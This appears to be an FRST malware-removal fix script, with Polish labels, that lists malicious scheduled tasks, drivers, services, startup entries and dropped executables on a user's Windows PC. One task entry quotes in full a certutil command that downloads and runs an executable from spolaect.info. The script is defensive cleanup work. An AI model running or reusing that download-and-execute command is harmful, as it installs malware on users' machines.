CreateRestorePoint:
CloseProcesses:
EmptyTemp:
HKLM-x32\...\Run: [] => [X]
Task: {0CEDFE21-885B-42B7-9F3E-FA3297423775} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [4651048 2021-09-04] (10124 -> ) [Brak podpisu cyfrowego] <==== UWAGA
Task: {5138E38C-B8B2-4E6B-BCD5-7E2CE7A18366} - System32\Tasks\services64 => C:\Users\Artur\AppData\Roaming\services64.exe [44032 2021-09-04] (Google5 Inc.) [Brak podpisu cyfrowego] <==== UWAGA
Task: {5A95EFA7-79CA-481D-9BFE-B6B8D9F2DF8B} - System32\Tasks\{AC6143B3-CF11-40A5-A1A4-A35F16A880C3} => C:\Windows\system32\pcalua.exe -a D:\Driver_D_CAN_USB\OBDSetup.exe -d D:\Driver_D_CAN_USB
Task: {6BE150D4-EAC7-4C0A-B27E-8A657D9E6142} - System32\Tasks\{85965F93-FBF2-4732-8E6F-3006B8F9C36A} => C:\Windows\system32\pcalua.exe -a C:\Users\Artur\Downloads\InterfejsB_BMW_USB\Driver_D_CAN_USB\OBDSetup.exe -d C:\Users\Artur\Downloads\InterfejsB_BMW_USB\Driver_D_CAN_USB
Task: {81D154D5-D5F8-4A76-BF12-28E79D5A9C1A} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f https://spolaect.info/app/app.exe C:\Users\Artur\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Artur\AppData\Local\Temp\csrss\scheduled.exe /31340 -> /C certutil.exe -urlcache -split -f hxxps://spolaect.info/app/app.exe C:\Users\Artur\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Artur\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== UWAGA
Tcpip\..\Interfaces\{B740712C-7AF1-4D14-B39C-3ABA122B83AC}: [DhcpNameServer] 192.168.0.1
FF Plugin: @microsoft.com/GENUINE -> disabled [Brak pliku]
FF Plugin-x32: @google.com/zxwebplugin -> C:\Windows\system32\npzxwebplugin.dll [Brak pliku]
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [Brak pliku]
S2 AppServiceb; C:\Windows\system32\LWPPKOYKN1.tmp [6144 2021-09-04] (Microsoft Corporation) [Brak podpisu cyfrowego] <==== UWAGA
R2 WinDefender; C:\Windows\windefender.exe [0 0000-00-00] (Odmowa dostępu) <==== UWAGA (Odmowa dostępu) <==== UWAGA
S2 CDIF3Service; D:\CDIF3\bin\c3svc.exe [X]
R3 Winmon; C:\Windows\System32\drivers\Winmon.sys [0 0000-00-00] () <==== UWAGA (zerobajtowy plik/folder)
R3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [0 0000-00-00] (Windows (R) Win 7 DDK provider) <==== UWAGA (zerobajtowy plik/folder)
R1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys [36096 2021-09-04] (WDKTestCert Admin,131666266076831434 -> ) [Brak podpisu cyfrowego] <==== UWAGA
S3 Synth3dVsc; System32\drivers\synth3dvsc.sys [X]
S3 tsusbhub; system32\drivers\tsusbhub.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
2021-09-04 10:04 - 2021-09-04 10:04 - 000166400 _____ (sdvsdsdvds) C:\Users\Artur\AppData\Roaming\1211288.exe
2021-09-04 10:04 - 2021-09-04 10:04 - 000166912 _____ (sdvsdsdvds) C:\Users\Artur\AppData\Roaming\2266923.exe
2021-09-04 10:04 - 2021-09-04 10:04 - 000086016 _____ (Hoting) C:\Users\Artur\AppData\Roaming\4839901.exe
2021-09-04 10:04 - 2021-09-04 10:04 - 000086016 _____ (Hoting) C:\Users\Artur\AppData\Roaming\5476827.exe
2021-09-04 10:05 - 2021-09-04 10:05 - 003223840 _____ (Realtek Semiconductor Corp.) C:\Users\Artur\AppData\Roaming\5495358.exe
2021-09-04 10:05 - 2021-09-04 10:05 - 000226816 _____ () C:\Users\Artur\AppData\Roaming\7717230.exe
2021-09-04 10:05 - 2021-09-04 10:05 - 000282112 _____ (hdgrfdgregre) C:\Users\Artur\AppData\Roaming\7776951.exe
2021-09-04 10:04 - 2021-09-04 10:04 - 000226816 _____ () C:\Users\Artur\AppData\Roaming\7830778.exe
2021-09-04 10:05 - 2021-09-04 10:05 - 000320000 _____ () C:\Users\Artur\AppData\Roaming\8071467.exe
2021-09-04 10:05 - 2021-09-04 10:05 - 000282112 _____ (hdgrfdgregre) C:\Users\Artur\AppData\Roaming\8618314.exe
2021-09-04 10:05 - 2021-09-04 10:55 - 000044032 _____ (Google5 Inc.) C:\Users\Artur\AppData\Roaming\services64.exe
MSCONFIG\startupreg: AgedViolet => "C:\Windows\rss\csrss.exe"
MSCONFIG\startupreg: WinHost => C:\Users\Artur\AppData\Roaming\WinHost\WinHoster.exe
FirewallRules: [{AEF00335-43FC-47FA-B740-E82BB8956699}] => (Allow) D:\CDIF3\bin\c3svc.exe => Brak pliku
FirewallRules: [{6C4EF42A-1A11-4276-A9E2-9335B5437D5E}] => (Allow) D:\CDIF3\bin\c3svc.exe => Brak pliku
FirewallRules: [{77D469D6-C6CC-4EB8-82FF-60F6260925A4}] => (Allow) D:\CDIF3\bin\c3.exe => Brak pliku
FirewallRules: [{01731096-7BFD-4AFC-ADB9-6FEABF138D01}] => (Allow) D:\CDIF3\bin\c3.exe => Brak pliku
FirewallRules: [{D2EDA4FF-B66A-4F2F-B6C1-537D164ECED2}] => (Allow) D:\CDIF3\bin\c3update.exe => Brak pliku
FirewallRules: [{3AB3D65B-2554-4D8D-A902-2E2E13D114AA}] => (Allow) D:\CDIF3\bin\c3update.exe => Brak pliku
FirewallRules: [{A190DC85-153F-4E86-9BD8-A5C73BAA84AF}] => (Allow) C:\Windows\rss\csrss.exe (10124 -> ) [Brak podpisu cyfrowego]
RemoveProxy:
Hosts: